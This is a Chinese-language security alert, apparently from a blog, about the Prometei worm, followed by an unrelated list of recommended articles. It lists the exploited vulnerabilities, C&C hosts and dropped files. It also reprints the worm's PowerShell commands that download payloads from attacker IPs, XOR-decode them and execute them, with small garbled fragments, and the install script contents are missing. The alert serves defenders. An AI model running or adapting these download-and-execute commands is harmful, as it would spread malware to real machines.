近日,蠕虫病毒Prometei正在全网传播。该病毒通过横向渗透攻击方式对局域网中的终端进行大面积入侵,并且可以跨平台(Window、Linux、macOS等系统)横向传播。提醒广大用户,尤其是企业、政府部门、学校、医院等拥有大型局域网机构,及时做好排查与防护工作,避免受到该病毒影响

病毒名称:Prometei

病毒种类:Trojan/Prometei.a

利用漏洞:永恒之蓝漏洞、Redis未授权访问漏洞、BlueKeep漏洞、Apache Log4j漏洞

注意事项1:Win7用户及时打上永恒之蓝补丁!

传播途径:局域网

注意事项1:尽量不要连接来路不明的网络以及公共网络

C&C服务器:

URL:
http://p2.feefreepool.net/cgi-bin/prometei.cgi
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgi
https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
http://p3.feefreepool.net/cgi-bin/prometei.cgi
http://dummy.zero/cgi-bin/prometei.cgi
IP:
23.94.251.245
104.130.132.131
88.198.246.242
注意事项1:建议把URL写入hosts文件进行屏蔽,防止病毒更新

释放文件:

C:\Windows\dell\sqhost.exe
C:\Windows\dell\sqhost_new.exe
C:\Windows\dell\install.cmd
C:\Windows\dell\rdpclip_new.exe
C:\Windows\dell\updates1_new.7z
C:\Windows\dell\updates2_new.7z
C:\Windows\dell\netwalker_new
C:\Windows\dell\uplugplay_new

执行命令:

  1. 病毒下载命令
    病毒接收到后门指令后,会通过命令行执行PowerShell脚本,下载、解压含有恶意文件的压缩包(updata.7z),执行解压后的install.cmd

powershell "if(-not (Test-Path 'C:\Windows\dell\sqhost.exe')) {(New-Object
Net.WebClient).DownloadFile('http://104.130.132.131/update.7z','update.7z');Start-
Process cmd.exe -ArgumentList '/c taskkill -f -im rdpclip.exe&sqhost -shalchk 0DE3401BB72D31AE94B899FEF25483E3D424DCDC update.7z&ping -n 2 127.0.0.3&7z x update.7z -phorhorl23 -oC:\Windows\dell -y&install.cmd';}"
  1. 执行install.bat
    install内容:
  2. RdpCIip横向传播模块
    RdpCIip横向传播模块会对局域网内所有的机器进行扫描,如:SMB、Redis、RPC、RDP、Apache、SSH、SQL Server、PostgreSQL服务端口,针对上述服务进行暴破攻击以及漏洞攻击(“永恒之蓝”、BlueKeep、ApacheLog4j 漏洞、Redis未经授权访问漏洞等),拥有大型局域网的政企机构面临较大的安全风险。在局域网暴破之前会通过miwalk模块(Mimikatz)获取系统登录凭证,通过获取的登录凭证和自带弱口令字典进行横向暴破攻击。攻击成功之后,被攻击主机会执行一段恶意代码。恶意代码会调用PowerShell命令,从服务器下载主模块并执行

cmd /C echo 123>C:\Windows\mshlpda32. dll
&powershell $p='C:\windows\zsvc.exe';
(New-Object Net.WebClient).DownloadFile('http://23.94.251.245/k.php? B=_%PROCESSOR_ARCHITECTURE%J%COMPUTERNAME%,XXXXXXXXXXXXXXXX@\$p);
$d=[IO.File]::ReadAllBytes($p);
$t=New-Object Byte[]($d.Length);
[int]$j=0;
for([int]$i=0;$i -It $d.Length;$i++) {$j+=66;$t[$i]=(($d[$i] -bxor ($i*3 -band 255))-$j) -band 255; }
[io.file]::WriteAllBytes($p?  );
Start-Process $p;

病毒专杀:马上写完

最新病毒预警--Prometei 蠕虫病毒相关推荐

  1. 如何使用计算机蠕虫病毒软件,incaseformat蠕虫病毒是什么?电脑若中病毒后如何修复。...

    原标题:incaseformat蠕虫病毒是什么?电脑若中病毒后如何修复. 昨天开始 国内各家安全大厂都发出预警 提醒电脑用户"incaseformat"蠕虫病毒 已再度开始发作 什 ...

  2. 蠕虫病毒 incaseformat 在国内肆虐,可导致用户数据丢失

    本文转载自 云头条 2021年1月13日,深信服.360.火绒安全实验室等国内安全公司对外发布预警,称一种名为incaseformat的蠕虫病毒在国内爆发. 今早某公司电脑中毒以后的情况: 深信服称, ...

  3. 【转载】蠕虫病毒 incaseformat 在国内肆虐,可导致用户数据丢失

    本文转载自 云头条 2021年1月13日,深信服.360.火绒安全实验室等国内安全公司对外发布预警,称一种名为incaseformat的蠕虫病毒在国内爆发. 今早某公司电脑中毒以后的情况: 深信服称, ...

  4. incaformat蠕虫病毒样本分析及查杀防范措施

    2021incaseformat蠕虫病毒 一.病毒简介 二.样本分析 三.查杀与恢复方式 四.预防措施 一.病毒简介 病毒名称:incaseformat 病毒性质:蠕虫病毒 影响范围:windows ...

  5. 突发!incaseformat蠕虫病毒来袭,警惕文件遭删除

    今日,邦润科技安全团队监测到一种名为incaseformat的蠕虫病毒在国内爆发,该蠕虫病毒执行后会自复制到系统盘Windows目录下,并创建注册表自启动,一旦用户重启主机,使得病毒母体从Window ...

  6. Morto蠕虫病毒分析报告

    文章目录 样本信息 病毒现场复现 分析过程 Loader部分 Payload部分 病毒查杀 样本信息 名称:cache.txt SHA1:a5f83e3baae0df2cdcf5b7e9e862705 ...

  7. 政企机构用户注意 蠕虫病毒Prometei正在针对局域网横向渗透传播

    近日,火绒安全实验室监测到蠕虫病毒"Prometei"正在全网传播.该病毒通过横向渗透攻击方式对局域网中的终端进行大面积入侵,并且可以跨平台(Window.Linux.macOS等 ...

  8. BlackHat上的工控蠕虫病毒 绿盟科技工控研究员用SCL语言编写实现 录像让你亲眼看看...

    本文将展示的是一种新型的PLC蠕虫病毒,该病毒可以不借助上位PC机,仅通过PLC之间进行互相传播.该病毒的实现思路,适用于多个厂家的PLC设备,并且可以在一定规则范围内相互进行传播.本文采用西门子PL ...

  9. “艾妮”(ANI)蠕虫病毒

    病毒名:艾妮(别名,麦英.ANI蠕虫) 英文名:MyInfect.af/DlOnlineGames/Trojan-Downloader.Win32.Agent.bky 技术分析: 1.释放病毒文件到如 ...

最新文章

  1. 【转】Android source build/envsetup.sh学习笔记
  2. oracle监听显示未成功_理解 oracle 的 lsnrctl status
  3. ADT启动SDK Manager时一闪而过
  4. linspace python_python np.linspace
  5. jQuery--.css(width)和.width()的区别
  6. utf8编码-汉字几字节
  7. ubuntu pycharm设置快捷图标_这些Ubuntu中的小技巧,你知道吗?
  8. Long Short-Term Memory Over Tree Structures
  9. Mysql 存储过程实现订单流水号
  10. FineBI 项目资源迁移
  11. VGA接口和HDMI接口有什么区别
  12. 聚类算法Kmens和密度峰值聚类
  13. 卡内基梅隆大学计算机专业录取难,卡内基梅隆大学计算机录取
  14. C#(OpenGL MathNet)处理Gauss光斑图像
  15. The JSP specification requires that an attribute name is preceded by whitesp
  16. Robcup2D足球学习记录【2020.01.10】
  17. 计算机硬件系统中 计算机心脏,办公室常用设备教案——计算机办公设备(计算机硬件及软件系统)02.doc...
  18. 《如何高效学习》:将所学的知识运用到实际中去
  19. HP-UX操作系统安装配置手册
  20. 解析v-if和v-show的区别和使用场景

热门文章

  1. 回望过去的一年,展望新的一年
  2. el-table合并单元格附表单包含表格
  3. sqlserver 删除表中重复的数据
  4. php重定向高数,基于PHP的高等数学在线测试软件
  5. Linux安装Docker并配置Docker镜像加速,daemon.json完整配置详解
  6. 窗口置顶工具v1.1.0
  7. iMazing管理和下载应用程序
  8. 计算机主机报警是什么原因,不同的电脑故障声音分别是什么意思【详解】
  9. 各种 RAID 详解
  10. 数据科学 6 参数估计与统计推断(概念)